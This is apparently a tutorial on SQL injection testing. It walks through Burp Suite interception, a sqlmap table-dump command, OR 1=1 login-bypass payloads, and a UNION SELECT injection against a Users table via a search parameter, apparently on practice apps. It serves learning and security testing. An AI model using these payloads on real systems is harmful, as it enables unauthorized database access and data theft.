SQL injection attack involves malicious SQL statements injected into a SQL database. You may inspect the page or capture the request using burp suite to understand what inputs are taken in and how they react to different SQL injections. Try find the syntax of the SQL command.
Here we assume the SQL is Select * from Users Where email= ‘inputvaule’. We try the word test, then test’ Or 1=1;--. The left side of the example shows how the SQL command will change. The – is used to comment anything after that we don’t know such as password.
This is a tool that automates SQL injections. Further use can be shown in first link of the further reading. The below example shows capturing a request using burpsuite. Saved in a file named bricks(can be anyname).
On the terminal the tables are then dumped using the command smqlmap -r brick -p username –dump
After a few a while it will dump the found tables.
A request is first capture on Burp suite using the intercept tool under Proxy.
It is then sent to the repeater for further tries. Initially we had ‘ss’ as the user name and password. We can now try make the request be as the following - SELECT * FROM users WHERE name= ‘‘ OR ‘1’=’1’ and password=’ ‘ OR ‘1’=’1’ . We insert the modified values in place of the ss then send the request. If this takes too much time the Intruder tool can help automate inputting the SQL attacks by using a list of attacks. Check the second further readings.
Here we try a search bar to see if the requests can accept SQL injections.
We capture the request.
Then we send to repeater and send the request with trying out test on the search parameter q:
the empty request we see raw Json or use beautifier tab to see the Json better. At q, if nothing is inserted, everything is returned.
When we try search ; to close the SQL we get an error but the error response may help us better inject. Below the error gives away that we haven’t included the brackets for the sql name search. It also shows deletedAt is Null, we may use this to find deleted items later. Hence, we now search for ‘));
Then we get a successful response
Now to test the union addition ‘)) UNION SELECT ‘1’, ‘2’, ‘3’, ‘4’, ‘5’, ‘6’, ‘7’, ‘8’FROM Users-- . we add this in the parameter tab so that it can change it into %% format
Then we send it to view users
Things to consider: